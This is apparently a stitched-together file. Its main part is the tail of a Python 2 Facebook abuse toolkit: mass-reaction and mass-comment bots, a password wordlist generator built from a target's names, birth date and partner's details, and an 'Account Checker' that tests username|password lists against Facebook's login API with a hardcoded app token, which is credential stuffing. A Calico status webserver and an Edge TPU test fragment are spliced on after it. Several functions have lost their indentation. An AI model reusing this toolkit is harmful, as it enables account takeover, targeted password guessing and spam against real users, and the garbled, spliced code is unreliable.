    elif bots =="7":
        unfriend()
    elif bots =="0":
        menu()
    else:
        print "\033[1;91m[!] Wrong input"
        bot_pilih()
##### MENU REACT #####
def menu_react():
    """Render the reaction-type menu for a target's posts and delegate to
    react_pilih()."""
    os.system('reset')
    # Require a cached token; wipe it and force re-login when missing.
    try:
        toket=open('login.txt','r').read()
    except IOError:
        print"\033[1;91m[!] Token not found"
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    os.system('reset')
    print logo
    print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
    print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
    print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
    print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
    print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
    print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
    print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
    print "║"
    react_pilih()
#//////////////
def react_pilih():
    """Map the menu choice to a Graph-API reaction type (global `tipe`) and
    run react(); recurses on invalid input."""
    global tipe
    aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
    if aksi =="":
        print "\033[1;91m[!] Wrong input"
        react_pilih()
    elif aksi =="1":
        tipe = "LIKE"
        react()
    elif aksi =="2":
        tipe = "LOVE"
        react()
    elif aksi =="3":
        tipe = "WOW"
        react()
    elif aksi =="4":
        tipe = "HAHA"
        react()
    elif aksi =="5":
        tipe = "SAD"
        react()
    elif aksi =="6":
        tipe = "ANGRY"
        react()
    elif aksi =="0":
        menu_bot()
    else:
        print "\033[1;91m[!] Wrong input"
        react_pilih()
#####NEXT
def react():
    """Post the reaction in global `tipe` on every post in a target user's
    feed (up to a user-supplied limit). Appends post ids to global `reaksi`."""
    os.system('reset')
    # Require a cached token; wipe it and force re-login when missing.
    try:
        toket=open('login.txt','r').read()
    except IOError:
        print"\033[1;91m[!] Token not found"
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    os.system('reset')
    print logo
    ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Target \033[1;91m:\033[1;97m ')
    limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
    try:
        oh = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
        ah = json.loads(oh.text)
        jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
        print 42*"\033[1;97m═"
        for a in ah['feed']['data']:
            y = a['id']
            reaksi.append(y)
            requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
            print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
        print 42*"\033[1;97m═"
        print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksi))
        raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
        menu_bot()
    # KeyError: response had no 'feed' (bad id or permission denied).
    except KeyError:
        print"\033[1;91m[!] ID not found"
        raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
        menu_bot()
##### BOT REACT GRUP #####
def grup_react():
    """Render the reaction-type menu for group posts and delegate to
    reactg_pilih()."""
    os.system('reset')
    # Require a cached token; wipe it and force re-login when missing.
    try:
        toket=open('login.txt','r').read()
    except IOError:
        print"\033[1;91m[!] Token not found"
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    os.system('reset')
    print logo
    print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
    print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
    print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
    print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
    print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
    print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
    print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
    print "║"
    reactg_pilih()
#//////////////
def reactg_pilih():
    """Map the menu choice to a reaction type (global `tipe`) and run
    reactg(); recurses on invalid input."""
    global tipe
    aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
    if aksi =="":
        print "\033[1;91m[!] Wrong input"
        reactg_pilih()
    elif aksi =="1":
        tipe = "LIKE"
        reactg()
    elif aksi =="2":
        tipe = "LOVE"
        reactg()
    elif aksi =="3":
        tipe = "WOW"
        reactg()
    elif aksi =="4":
        tipe = "HAHA"
        reactg()
    elif aksi =="5":
        tipe = "SAD"
        reactg()
    elif aksi =="6":
        tipe = "ANGRY"
        reactg()
    elif aksi =="0":
        menu_bot()
    else:
        print "\033[1;91m[!] Wrong input"
        reactg_pilih()
#####NEXT
def reactg():
    """Post the reaction in global `tipe` on every post in a group's feed
    (v3.0 Graph API). Appends post ids to global `reaksigrup`."""
    os.system('reset')
    # Require a cached token; wipe it and force re-login when missing.
    try:
        toket=open('login.txt','r').read()
    except IOError:
        print"\033[1;91m[!] Token not found"
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    os.system('reset')
    print logo
    ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Group \033[1;91m:\033[1;97m ')
    limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
    # Resolve and display the group name first as a sanity check.
    try:
        r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
        asw=json.loads(r.text)
        print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
    except KeyError:
        print"\033[1;91m[!] Group not found"
        raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
        grup_react()
    try:
        oh = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
        ah = json.loads(oh.text)
        jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
        print 42*"\033[1;97m═"
        for a in ah['feed']['data']:
            y = a['id']
            reaksigrup.append(y)
            requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
            print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
        print 42*"\033[1;97m═"
        print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksigrup))
        raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
        menu_bot()
    except KeyError:
        print"\033[1;91m[!] ID not found"
        raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
        menu_bot()
##### BOT KOMEN #####
def bot_komen():
    """Post a user-supplied comment on every post in a target user's feed.
    '<>' in the comment becomes a newline. Appends post ids to global `komen`."""
    os.system('reset')
    # Require a cached token; wipe it and force re-login when missing.
    try:
        toket=open('login.txt','r').read()
    except IOError:
        print"\033[1;91m[!] Token not found"
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    os.system('reset')
    print logo
    print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
    ide = raw_input('\033[1;91m[+] \033[1;92mID Target \033[1;91m:\033[1;97m ')
    km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
    limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
    km=km.replace('<>','\n')
    try:
        p = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
        a = json.loads(p.text)
        jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
        print 42*"\033[1;97m═"
        for s in a['feed']['data']:
            f = s['id']
            komen.append(f)
            requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
            print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
        print 42*"\033[1;97m═"
        print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komen))
        raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
        menu_bot()
    except KeyError:
        print"\033[1;91m[!] ID not found"
        raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
        menu_bot()
##### BOT KOMEN GRUP #####
def grup_komen():
    """Post a user-supplied comment on every post in a group's feed (v3.0
    Graph API). Appends post ids to global `komengrup`."""
    os.system('reset')
    # Require a cached token; wipe it and force re-login when missing.
    try:
        toket=open('login.txt','r').read()
    except IOError:
        print"\033[1;91m[!] Token not found"
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    os.system('reset')
    print logo
    print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
    ide = raw_input('\033[1;91m[+] \033[1;92mID Group \033[1;91m:\033[1;97m ')
    km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
    limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
    km=km.replace('<>','\n')
    # Resolve and display the group name first as a sanity check.
    try:
        r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
        asw=json.loads(r.text)
        print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
    except KeyError:
        print"\033[1;91m[!] Group not found"
        raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
        menu_bot()
    try:
        p = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
        a = json.loads(p.text)
        jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
        print 42*"\033[1;97m═"
        for s in a['feed']['data']:
            f = s['id']
            komengrup.append(f)
            requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
            print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
        print 42*"\033[1;97m═"
        print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komengrup))
        raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
        menu_bot()
    except KeyError:
        print"\033[1;91m[!] Error"
        raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
        menu_bot()
##### HAPUS POST #####
def deletepost():
    """Delete every post on the logged-in account's own feed via the
    ?method=delete Graph API form."""
    os.system('reset')
    # Require a cached token and resolve the account name in one step.
    try:
        toket=open('login.txt','r').read()
        nam = requests.get('https://graph.facebook.com/me?access_token='+toket)
        lol = json.loads(nam.text)
        nama = lol['name']
    except IOError:
        print"\033[1;91m[!] Token not found"
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    os.system('reset')
    print logo
    print("\033[1;91m[+] \033[1;92mFrom \033[1;91m: \033[1;97m%s"%nama)
    jalan("\033[1;91m[+] \033[1;92mStart\033[1;97m ...")
    print 42*"\033[1;97m═"
    asu = requests.get('https://graph.facebook.com/me/feed?access_token='+toket)
    asus = json.loads(asu.text)
    for p in asus['data']:
        id = p['id']
        piro = 0
        url = requests.get('https://graph.facebook.com/'+id+'?method=delete&access_token='+toket)
        ok = json.loads(url.text)
        # On success the API returns bare `true`, so ok is a bool and
        # ok['error'] raises TypeError -> the TypeError branch means "deleted".
        try:
            error = ok['error']['message']
            print '\033[1;91m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;91m] \033[1;95mFailed'
        except TypeError:
            print '\033[1;92m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;92m] \033[1;96mDeleted'
            piro += 1
        except requests.exceptions.ConnectionError:
            print"\033[1;91m[!] Connection Error"
            raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
            menu_bot()
    print 42*"\033[1;97m═"
    print"\033[1;91m[+] \033[1;92mDone"
    raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
    menu_bot()
##### ACCEPT FRIEND #####
def accept():
    """Accept all pending friend requests (up to a user-supplied limit)."""
    os.system('reset')
    # Require a cached token; wipe it and force re-login when missing.
    try:
        toket=open('login.txt','r').read()
    except IOError:
        print"\033[1;91m[!] Token not found"
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    os.system('reset')
    print logo
    limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
    r = requests.get('https://graph.facebook.com/me/friendrequests?limit='+limit+'&access_token='+toket)
    teman = json.loads(r.text)
    # Crude emptiness check on the JSON 'data' array.
    if '[]' in str(teman['data']):
        print"\033[1;91m[!] No friend request"
        raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
        menu_bot()
    jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
    print 42*"\033[1;97m═"
    for i in teman['data']:
        # Posting to /me/friends/<id> confirms the request.
        gas = requests.post('https://graph.facebook.com/me/friends/'+i['from']['id']+'?access_token='+toket)
        a = json.loads(gas.text)
        if 'error' in str(a):
            print "\033[1;97m[ \033[1;91mFailed\033[1;97m ] "+i['from']['name']
        else:
            print "\033[1;97m[ \033[1;92mAccept\033[1;97m ] "+i['from']['name']
    print 42*"\033[1;97m═"
    print"\033[1;91m[+] \033[1;92mDone"
    raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
    menu_bot()
##### UNFRIEND ####
def unfriend():
    """Delete all friends of the logged-in account, one by one, until
    interrupted with CTRL+C."""
    os.system('reset')
    # Require a cached token; wipe it and force re-login when missing.
    try:
        toket=open('login.txt','r').read()
    except IOError:
        print"\033[1;91m[!] Token not found"
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    os.system('reset')
    print logo
    jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
    print "\033[1;97mStop \033[1;91mCTRL+C"
    print 42*"\033[1;97m═"
    try:
        pek = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
        cok = json.loads(pek.text)
        for i in cok['data']:
            nama = i['name']
            id = i['id']
            requests.delete("https://graph.facebook.com/me/friends?uid="+id+"&access_token="+toket)
            print "\033[1;97m[\033[1;92m Deleted \033[1;97m] "+nama
    except IndexError: pass
    except KeyboardInterrupt:
        print "\033[1;91m[!] Stopped"
        raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
        menu_bot()
    print"\n\033[1;91m[+] \033[1;92mDone"
    raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
    menu_bot()
#### LAIN LAIN #####
# #
####MENU LAIN#####
def lain():
    """Render the 'other tools' menu and delegate choice handling to
    pilih_lain()."""
    os.system('reset')
    # Require a cached token; wipe it and force re-login when missing.
    try:
        toket=open('login.txt','r').read()
    except IOError:
        print"\033[1;91m[!] Token not found"
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    os.system('reset')
    print logo
    print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Create Post"
    print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Create Wordlist"
    print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Account Checker"
    print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m See my group list"
    print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Profile Guard"
    print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
    print "║"
    pilih_lain()
#////////////
def pilih_lain():
other = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if other =="":
print "\033[1;91m[!] Wrong input"
pilih_lain()
elif other =="1":
status()
elif other =="2":
wordlist()
elif other =="3":
check_akun()
elif other =="4":
grupsaya()
elif other =="5":
guard()
elif other =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
pilih_lain()
##### STATUS #####
def status():
    """Publish a text status on the logged-in account's feed and show the
    resulting post id."""
    os.system('reset')
    # Require a cached token; wipe it and force re-login when missing.
    try:
        toket=open('login.txt','r').read()
    except IOError:
        print"\033[1;91m[!] Token not found"
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    os.system('reset')
    print logo
    msg=raw_input('\033[1;91m[+] \033[1;92mType status \033[1;91m:\033[1;97m ')
    if msg == "":
        print "\033[1;91m[!] Don't be empty"
        raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
        lain()
    else:
        # GET with method=POST is the legacy Graph API form of a publish call.
        res = requests.get("https://graph.facebook.com/me/feed?method=POST&message="+msg+"&access_token="+toket)
        op = json.loads(res.text)
        jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
        print 42*"\033[1;97m═"
        print"\033[1;91m[+] \033[1;92mStatus ID\033[1;91m : \033[1;97m"+op['id']
        raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
        lain()
########### CREATE WORDLIST ##########
def wordlist():
    """Interactively build a password wordlist from a target's personal data
    (names, nickname, birth date, partner data) and save it as <name>.txt.

    Combinations are generated by the big format-string write below, then
    each of four base words is suffixed with 1..100.
    """
    os.system('reset')
    # Require a cached token; wipe it and force re-login when missing.
    try:
        toket=open('login.txt','r').read()
    except IOError:
        print"\033[1;91m[!] Token not found"
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    try:
        os.system('reset')
        print logo
        print "\033[1;91m[?] \033[1;92mFill in the complete data of the target below"
        print 42*"\033[1;97m═"
        a = raw_input("\033[1;91m[+] \033[1;92mNama Depan \033[1;97m: ")
        file = open(a+".txt", 'w')
        b=raw_input("\033[1;91m[+] \033[1;92mNama Tengah \033[1;97m: ")
        c=raw_input("\033[1;91m[+] \033[1;92mNama Belakang \033[1;97m: ")
        d=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan \033[1;97m: ")
        e=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir >\033[1;96mex: |DDMMYY| \033[1;97m: ")
        # Split the DDMMYY birth date into day / month / year fragments.
        f=e[0:2]
        g=e[2:4]
        h=e[4:]
        print 42*"\033[1;97m═"
        print("\033[1;91m[?] \033[1;93mKalo Jomblo SKIP aja :v")
        i=raw_input("\033[1;91m[+] \033[1;92mNama Pacar \033[1;97m: ")
        j=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan Pacar \033[1;97m: ")
        k=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir Pacar >\033[1;96mex: |DDMMYY| \033[1;97m: ")
        jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
        l=k[0:2]
        m=k[2:4]
        n=k[4:]
        # One newline-separated candidate per %s%s(%s) pair: every pairing of
        # names, nicknames and date fragments for target and partner.
        file.write("%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s" % (a,c,a,b,b,a,b,c,c,a,c,b,a,a,b,b,c,c,a,d,b,d,c,d,d,d,d,a,d,b,d,c,a,e,a,f,a,g,a,h,b,e,b,f,b,g,b,h,c,e,c,f,c,g,c,h,d,e,d,f,d,g,d,h,e,a,f,a,g,a,h,a,e,b,f,b,g,b,h,b,e,c,f,c,g,c,h,c,e,d,f,d,g,d,h,d,d,d,a,f,g,a,g,h,f,g,f,h,f,f,g,f,g,h,g,g,h,f,h,g,h,h,h,g,f,a,g,h,b,f,g,b,g,h,c,f,g,c,g,h,d,f,g,d,g,h,a,i,a,j,a,k,i,e,i,j,i,k,b,i,b,j,b,k,c,i,c,j,c,k,e,k,j,a,j,b,j,c,j,d,j,j,k,a,k,b,k,c,k,d,k,k,i,l,i,m,i,n,j,l,j,m,j,n,j,k))
        # Numeric-suffix candidates: <word>1 .. <word>100.
        wg = 0
        while (wg < 100):
            wg = wg + 1
            file.write(a + str(wg) + '\n')
        en = 0
        while (en < 100):
            en = en + 1
            file.write(i + str(en) + '\n')
        word = 0
        while (word < 100):
            word = word + 1
            file.write(d + str(word) + '\n')
        gen = 0
        while (gen < 100):
            gen = gen + 1
            file.write(j + str(gen) + '\n')
        file.close()
        time.sleep(1.5)
        print 42*"\033[1;97m═"
        print ("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97m %s.txt" %a)
        raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
        lain()
    except IOError, e:
        print("\033[1;91m[!] Failed")
        raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
        lain()
##### CHECKER #####
def check_akun():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mCreate in file\033[1;91m : \033[1;97musername|password"
print 42*"\033[1;97m═"
live = []
cek = []
die = []
try:
file = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m:\033[1;97m ")
list = open(file,'r').readlines()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
pemisah = raw_input("\033[1;91m[+] \033[1;92mSeparator \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for meki in list:
username, password = (meki.strip()).split(str(pemisah))
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(password)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print"\033[1;97m[ \033[1;92mLive\033[1;97m ] \033[1;97m"+username+"|"+password
elif 'www.facebook.com' in mpsh["error_msg"]:
cek.append(password)
print"\033[1;97m[ \033[1;93mCheck\033[1;97m ] \033[1;97m"+username+"|"+password
else:
die.append(password)
print"\033[1;97m[ \033[1;91mDie\033[1;97m ] \033[1;97m"+username+"|"+password
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal\033[1;91m : \033[1;97mLive=\033[1;92m"+str(len(live))+" \033[1;97mCheck=\033[1;93m"+str(len(cek))+" \033[1;97mDie=\033[1;91m"+str(len(die))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### GRUP SAYA #####
def grupsaya():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print "\033[1;97m[ \033[1;92mMyGroup\033[1;97m ] "+str(id)+" => "+str(nama)
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;91m[!] Group not found')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No Connection"
keluar()
except IOError:
print "\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### PROFIL GUARD #####
def guard():
    """Menu to turn the Facebook profile-picture guard on or off via gaz()."""
    global toket
    os.system('reset')
    # Require a cached token; wipe it and force re-login when missing.
    try:
        toket=open('login.txt','r').read()
    except IOError:
        print"\033[1;91m[!] Token not found"
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    os.system('reset')
    print logo
    print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Activate"
    print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Not activate"
    print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
    print "║"
    g = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
    # gaz() expects the lowercase JSON strings "true"/"false".
    if g == "1":
        aktif = "true"
        gaz(toket, aktif)
    elif g == "2":
        non = "false"
        gaz(toket, non)
    elif g =="0":
        lain()
    elif g =="":
        keluar()
    else:
        keluar()
def get_userid(toket):
    """Return the numeric Facebook user id belonging to the access token."""
    profile = requests.get("https://graph.facebook.com/me?access_token=%s" % toket)
    return json.loads(profile.text)["id"]
def gaz(toket, enable = True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {"Content-Type" : "application/x-www-form-urlencoded", "Authorization" : "OAuth %s" % toket}
url = "https://graph.facebook.com/graphql"
res = requests.post(url, data = data, headers = headers)
print(res.text)
if '"is_shielded":true' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mActivate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
elif '"is_shielded":false' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;91mNot activate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
print "\033[1;91m[!] Error"
keluar()
# Script entry point: lisensi() is defined earlier in the file — presumably a
# license/authorization gate run before the menus; confirm against full file.
lisensi()
|
webserver.py | #!/usr/bin/env python
# Copyright 2015 Metaswitch Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import threading
from flask import Flask
from config import config
from zookeeper import ZkDatastore
# Instantiate the Flask app and a ZkDatastore: we use our own datastore
# from the framework since we are running in a different thread.
app = Flask(__name__, static_url_path='')
zk = ZkDatastore()
def launch_webserver():
    """
    Start the Flask app on a background daemon thread.

    Returns the Thread object; callers may join it if they need to know
    when the server terminates.
    """
    server_thread = threading.Thread(
        target=app.run,
        kwargs={
            "host": config.webserver_bind_ip,
            "port": config.webserver_bind_port,
        },
    )
    # Daemonize so the webserver never keeps the process alive on shutdown.
    server_thread.daemon = True
    server_thread.start()
    return server_thread
@app.route("/")
def html_server():
    """
    Serve the static Calico status page at the web root.
    """
    return app.send_static_file("calico-status.html")
@app.route('/json')
def agent_json():
    """
    Return the raw per-agent task status read from ZooKeeper, as JSON.
    """
    return json.dumps(zk.load_agents_raw_data())
@app.route("/health")
def check_health():
    """
    Liveness probe endpoint; always reports healthy.
    """
    return '{"health": "OK"}'
|
multiple_tpus_test.py | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import unittest
from . import test_utils
from edgetpu.basic import edgetpu_utils
from edgetpu.classification.engine import BasicEngine
from edgetpu.classification.engine import ClassificationEngine
from edgetpu.detection.engine import DetectionEngine
import numpy as np
class MultipleTpusTest(unittest.TestCase):
    """Tests exercising multiple Edge TPU devices/engines concurrently.

    Requires at least one unassigned Edge TPU attached and the edgetpu test
    data set (model + image files) available via test_utils.
    """

    def test_create_basic_engine_with_specific_path(self):
        # There must be at least one unassigned Edge TPU to bind to.
        edge_tpus = edgetpu_utils.ListEdgeTpuPaths(
            edgetpu_utils.EDGE_TPU_STATE_UNASSIGNED)
        self.assertGreater(len(edge_tpus), 0)
